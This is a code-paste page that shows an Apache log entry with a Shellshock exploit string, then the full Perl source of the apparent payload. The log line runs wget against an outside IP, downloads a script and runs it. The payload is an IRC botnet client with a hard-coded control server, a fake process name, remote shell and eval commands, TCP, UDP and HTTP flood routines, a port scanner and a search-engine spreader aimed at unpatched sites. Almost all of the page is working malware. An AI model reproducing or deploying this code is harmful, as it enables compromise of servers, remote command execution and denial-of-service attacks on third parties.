Shellshock payload

Skapad 3 år sedan, skriven i Perl, med 334 visningar.
URL http://kod.perl.se/view/2a7684db Bädda in
Ladda hem koden eller visa koden i råformatVisa bredare version
  1. $ sudo tail /var/log/apache2/access.log
  2. [...]
  3. 89.248.172.175 - - [30/Nov/2014:16:20:16 +0100] "GET /phppath/cgi_wrapper HTTP/1.1" 404 449 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /tmp;wget -q http://82.165.135.9/android.txt;perl android.txt;rm -rf android*\");'"
  4. [...]
  5.  
  6. ----------------------------
  7.  
  8. #!/usr/bin/perl
  9. my $processo = '/usr/sbin/httpd';
  10. my $linas_max='2';
  11. my $sleep='5';
  12. my @adms=("X", "root" ,"Y");
  13. my @hostauth=("evil");
  14. my @canais=("#new");
  15. my $nick='x0x';
  16. my $ircname ='rx';
  17. chop (my $realname = `uname -sr`);
  18. $servidor='82.165.130.187' unless $servidor;
  19. my $porta='12443';
  20. my $VERSAO = '0.5';
  21. $SIG{'INT'} = 'IGNORE';
  22. $SIG{'HUP'} = 'IGNORE';
  23. $SIG{'TERM'} = 'IGNORE';
  24. $SIG{'CHLD'} = 'IGNORE';
  25. $SIG{'PS'} = 'IGNORE';
  26. use IO::Socket;
  27. use Socket;
  28. use IO::Select;
  29. chdir("/");
  30. $servidor="$ARGV[0]" if $ARGV[0];
  31. $0="$processo"."\0"x16;;
  32. my $pid=fork;
  33. exit if $pid;
  34. die "Problema com o fork: $!" unless defined($pid);
  35.  
  36. our %irc_servers;
  37. our %DCC;
  38. my $dcc_sel = new IO::Select->new();
  39.  
  40. $sel_cliente = IO::Select->new();
  41. sub sendraw {
  42.   if ($#_ == '1') {
  43.     my $socket = $_[0];
  44.     print $socket "$_[1]\n";
  45.   } else {
  46.       print $IRC_cur_socket "$_[0]\n";
  47.   }
  48. }
  49.  
  50. sub conectar {
  51.    my $meunick = $_[0];
  52.    my $servidor_con = $_[1];
  53.    my $porta_con = $_[2];
  54.  
  55.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  56.    if (defined($IRC_socket)) {
  57.      $IRC_cur_socket = $IRC_socket;
  58.  
  59.      $IRC_socket->autoflush(1);
  60.      $sel_cliente->add($IRC_socket);
  61.  
  62.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  63.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  64.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  65.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  66.      nick("$meunick");
  67.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  68.      sleep 1;
  69.    }
  70. }
  71. my $line_temp;
  72. while( 1 ) {
  73.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  74.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  75.    my @ready = $sel_cliente->can_read(0);
  76.    next unless(@ready);
  77.    foreach $fh (@ready) {
  78.      $IRC_cur_socket = $fh;
  79.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  80.      $nread = sysread($fh, $msg, 4096);
  81.      if ($nread == 0) {
  82.         $sel_cliente->remove($fh);
  83.         $fh->close;
  84.         delete($irc_servers{$fh});
  85.      }
  86.      @lines = split (/\n/, $msg);
  87.  
  88.      for(my $c=0; $c<= $#lines; $c++) {
  89.        $line = $lines[$c];
  90.        $line=$line_temp.$line if ($line_temp);
  91.        $line_temp='';
  92.        $line =~ s/\r$//;
  93.        unless ($c == $#lines) {
  94.          parse("$line");
  95.        } else {
  96.            if ($#lines == 0) {
  97.              parse("$line");
  98.            } elsif ($lines[$c] =~ /\r$/) {
  99.                parse("$line");
  100.            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  101.                parse("$line");
  102.            } else {
  103.                $line_temp = $line;
  104.            }
  105.        }
  106.       }
  107.    }
  108. }
  109.  
  110. sub parse {
  111.    my $servarg = shift;
  112.    if ($servarg =~ /^PING \:(.*)/) {
  113.      sendraw("PONG :$1");
  114.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  115.        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  116.        if ($args =~ /^\001VERSION\001$/) {
  117.          notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
  118.        }
  119.        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
  120.        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
  121.          if ($onde eq "$meunick"){
  122.            shell("$pn", "$args");
  123.          }
  124.          if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
  125.             my $natrix = $1;
  126.             my $arg = $2;
  127.             if ($arg =~ /^\!(.*)/) {
  128.               ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
  129.             } elsif ($arg =~ /^\@(.*)/) {
  130.                 $ondep = $onde;
  131.                 $ondep = $pn if $onde eq $meunick;
  132.                 bfunc("$ondep","$1");
  133.             } else {
  134.                 shell("$onde", "$arg");
  135.             }
  136.          }
  137.        }
  138.  }
  139.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  140.        if (lc($1) eq lc($meunick)) {
  141.          $meunick=$4;
  142.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  143.        }
  144.    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  145.        nick("$meunick|".int rand(999999));
  146.    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  147.        $meunick = $2;
  148.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  149.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  150.        foreach my $canal (@canais) {
  151.          sendraw("JOIN $canal ddosit");
  152.        }
  153.    }
  154. }
  155.  
  156.  
  157. sub bfunc {
  158.   my $printl = $_[0];
  159.   my $funcarg = $_[1];
  160.   if (my $pid = fork) {
  161.      waitpid($pid, 0);
  162.   } else {
  163.       if (fork) {
  164.          exit;
  165.        } else {
  166.            if ($funcarg =~ /^portscan (.*)/) {
  167.              my $hostip="$1";
  168.              my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  169.              my (@aberta, %porta_banner);
  170.       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
  171.              foreach my $porta (@portas)  {
  172.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
  173.                 if ($scansock) {
  174.                    push (@aberta, $porta);
  175.                    $scansock->close;
  176.                 }
  177.              }
  178.  
  179.              if (@aberta) {
  180.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
  181.              } else {
  182.                sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
  183.              }
  184.            }
  185.            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  186.       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
  187.       my $itime = time;
  188.       my ($cur_time);
  189.              $cur_time = time - $itime;
  190.       while ($3>$cur_time){
  191.              $cur_time = time - $itime;
  192.       &tcpflooder("$1","$2","$3");
  193.              }
  194.       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
  195.            }
  196.     if ($funcarg =~ /^version/) {
  197.   sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
  198.   }
  199.            if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
  200.       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
  201.       srand;
  202.       my $itime = time;
  203.       my ($cur_time);
  204.       my ($exploited);
  205.       $boturl=$2;
  206.              $cur_time = time - $itime;$exploited = 0;
  207.   while($1>$cur_time){
  208.       $cur_time = time - $itime;
  209.       @urls=fetch();
  210.    foreach $url (@urls) {
  211.    $cur_time = time - $itime;
  212.    my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
  213.  
  214.    $url =$path."/$goni$boturl" ;
  215.  
  216.  
  217.  
  218.    $page = http_query($url);
  219.    $exploited = $exploited + 1;
  220.       }
  221.   }
  222.       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
  223.            }
  224.            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
  225.       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
  226.       my $itime = time;
  227.       my ($cur_time);
  228.              $cur_time = time - $itime;
  229.       while ($2>$cur_time){
  230.              $cur_time = time - $itime;
  231.       my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
  232.              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
  233.       close($socket);
  234.              }
  235.       sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
  236.            }
  237.            if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  238.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
  239.              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
  240.              $dtime = 1 if $dtime == 0;
  241.              my %bytes;
  242.              $bytes{igmp} = $2 * $pacotes{igmp};
  243.              $bytes{icmp} = $2 * $pacotes{icmp};
  244.              $bytes{o} = $2 * $pacotes{o};
  245.              $bytes{udp} = $2 * $pacotes{udp};
  246.              $bytes{tcp} = $2 * $pacotes{tcp};
  247.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
  248.            }
  249.            exit;
  250.        }
  251.   }
  252. }
  253.  
  254. sub ircase {
  255.   my ($kem, $printl, $case) = @_;
  256.  
  257.   if ($case =~ /^join (.*)/) {
  258.      j("$1");
  259.    }
  260.  
  261. if ($case =~ /^refresh (.*)/) {
  262. my $goni = $titi[rand scalar @titi];
  263.  }
  264.  
  265.    if ($case =~ /^part (.*)/) {
  266.       p("$1");
  267.    }
  268.    if ($case =~ /^rejoin\s+(.*)/) {
  269.       my $chan = $1;
  270.       if ($chan =~ /^(\d+) (.*)/) {
  271.         for (my $ca = 1; $ca <= $1; $ca++ ) {
  272.           p("$2");
  273.           j("$2");
  274.         }
  275.       } else {
  276.           p("$chan");
  277.           j("$chan");
  278.       }
  279.    }
  280.    if ($case =~ /^op/) {
  281.       op("$printl", "$kem") if $case eq "op";
  282.       my $oarg = substr($case, 3);
  283.       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  284.    }
  285.    if ($case =~ /^deop/) {
  286.       deop("$printl", "$kem") if $case eq "deop";
  287.       my $oarg = substr($case, 5);
  288.       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  289.    }
  290.    if ($case =~ /^msg\s+(\S+) (.*)/) {
  291.       msg("$1", "$2");
  292.    }
  293.    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  294.       for (my $cf = 1; $cf <= $1; $cf++) {
  295.         msg("$2", "$3");
  296.       }
  297.    }
  298.    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
  299.       ctcp("$1", "$2");
  300.    }
  301.    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  302.       for (my $cf = 1; $cf <= $1; $cf++) {
  303.         ctcp("$2", "$3");
  304.       }
  305.    }
  306.    if ($case =~ /^nick (.*)/) {
  307.       nick("$1");
  308.    }
  309.    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
  310.        conectar("$2", "$1", 6667);
  311.    }
  312.    if ($case =~ /^raw (.*)/) {
  313.       sendraw("$1");
  314.    }
  315.    if ($case =~ /^eval (.*)/) {
  316.      eval "$1";
  317.    }
  318. }
  319.  
  320. sub shell {
  321.   my $printl=$_[0];
  322.   my $comando=$_[1];
  323.   if ($comando =~ /cd (.*)/) {
  324.     chdir("$1") || msg("$printl", "No such file or directory");
  325.     return;
  326.   }
  327.   elsif ($pid = fork) {
  328.      waitpid($pid, 0);
  329.   } else {
  330.       if (fork) {
  331.          exit;
  332.        } else {
  333.            my @resp=`$comando 2>&1 3>&1`;
  334.            my $c=0;
  335.            foreach my $linha (@resp) {
  336.              $c++;
  337.              chop $linha;
  338.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  339.              if ($c == "$linas_max") {
  340.                $c=0;
  341.                sleep $sleep;
  342.              }
  343.            }
  344.            exit;
  345.        }
  346.   }
  347. }
  348.  
  349. sub tcpflooder {
  350.  my $itime = time;
  351.  my ($cur_time);
  352.  my ($ia,$pa,$proto,$j,$l,$t);
  353.  $ia=inet_aton($_[0]);
  354.  $pa=sockaddr_in($_[1],$ia);
  355.  $ftime=$_[2];
  356.  $proto=getprotobyname('tcp');
  357.  $j=0;$l=0;
  358.  $cur_time = time - $itime;
  359.  while ($l<1000){
  360.   $cur_time = time - $itime;
  361.   last if $cur_time >= $ftime;
  362.   $t="SOCK$l";
  363.   socket($t,PF_INET,SOCK_STREAM,$proto);
  364.   connect($t,$pa)||$j--;
  365.   $j++;$l++;
  366.  }
  367.  $l=0;
  368.  while ($l<1000){
  369.   $cur_time = time - $itime;
  370.   last if $cur_time >= $ftime;
  371.   $t="SOCK$l";
  372.   shutdown($t,2);
  373.   $l++;
  374.  }
  375. }
  376.  
  377. sub udpflooder {
  378.   my $iaddr = inet_aton($_[0]);
  379.   my $msg = 'A' x $_[1];
  380.   my $ftime = $_[2];
  381.   my $cp = 0;
  382.   my (%pacotes);
  383.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  384.  
  385.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  386.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  387.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  388.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  389.   return(undef) if $cp == 4;
  390.   my $itime = time;
  391.   my ($cur_time);
  392.   while ( 1 ) {
  393.      for (my $porta = 1; $porta <= 65000; $porta++) {
  394.        $cur_time = time - $itime;
  395.        last if $cur_time >= $ftime;
  396.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
  397.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
  398.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
  399.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
  400.  
  401.        for (my $pc = 3; $pc <= 255;$pc++) {
  402.          next if $pc == 6;
  403.          $cur_time = time - $itime;
  404.          last if $cur_time >= $ftime;
  405.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  406.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
  407.        }
  408.      }
  409.      last if $cur_time >= $ftime;
  410.   }
  411.   return($cur_time, %pacotes);
  412. }
  413.  
  414. sub ctcp {
  415.    return unless $#_ == 1;
  416.    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  417. }
  418. sub msg {
  419.    return unless $#_ == 1;
  420.    sendraw("PRIVMSG $_[0] :$_[1]");
  421. }
  422. sub notice {
  423.    return unless $#_ == 1;
  424.    sendraw("NOTICE $_[0] :$_[1]");
  425. }
  426. sub op {
  427.    return unless $#_ == 1;
  428.    sendraw("MODE $_[0] +o $_[1]");
  429. }
  430. sub deop {
  431.    return unless $#_ == 1;
  432.    sendraw("MODE $_[0] -o $_[1]");
  433. }
  434. sub j { &join(@_); }
  435. sub join {
  436.    return unless $#_ == 0;
  437.    sendraw("JOIN $_[0]");
  438. }
  439. sub p { part(@_); }
  440. sub part {
  441.   sendraw("PART $_[0]");
  442. }
  443. sub nick {
  444.   return unless $#_ == 0;
  445.   sendraw("NICK $_[0]");
  446. }
  447. sub quit {
  448.   sendraw("QUIT :$_[0]");
  449. }
  450.  
  451. # Spreader
  452. # this 'spreader' code isnot mine, i dont know who coded it.
  453. # update: well, i just fix0red this shit a bit.
  454. #
  455.  
  456. sub fetch(){
  457.     my $rnd=(int(rand(9999)));
  458.     my $n= 80;
  459.     if ($rnd<5000) { $n<<=1;}
  460.     my $s= (int(rand(5)) * $n);
  461.  
  462. my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
  463.   "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
  464.   "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
  465.   "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
  466.   "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
  467.   "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
  468.   "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
  469.   "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
  470.   "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
  471.   "vu","vn","ye","yu","cd","zm","zw","");
  472. my @str;
  473.  
  474. foreach $dom  (@dominios)
  475. {
  476.  push (@str,"allinurl:%22".$dom."/".$goni."%22");
  477. }
  478.  
  479.     my $query="www.google.com/search?q=";
  480.     $query.=$str[(rand(scalar(@str)))];
  481.     $query.="&num=$n&start=$s";
  482.  
  483.  
  484.     my @lst=();
  485.     my $page = http_query($query);
  486.     while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
  487.  if ($1 !~ m/google|cache|translate/){
  488.      push (@lst,$1);
  489.  }
  490.     }
  491.     return (@lst);
  492. }
  493.  
  494.  
  495. sub http_query($){
  496.     my ($url) = @_;
  497.     my $host=$url;
  498.     my $query=$url;
  499.  
  500.     my $page="";
  501.     $host =~ s/href=\"?http:\/\///;
  502.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  503.     $query =~s/$host//;
  504.     if ($query eq "") {$query="/";};
  505.     eval {
  506.  local $SIG{ALRM} = sub { die "1";};
  507.  alarm 10;
  508.  my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  509.  print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  510.  my @r = <$sock>;
  511.  $page="@r";
  512.  alarm 0;
  513.  close($sock);
  514.     };
  515.     return $page;
  516.  
  517. }

Svara på "Shellshock payload"

Här kan du skriva ett svar till kodsnutten ovan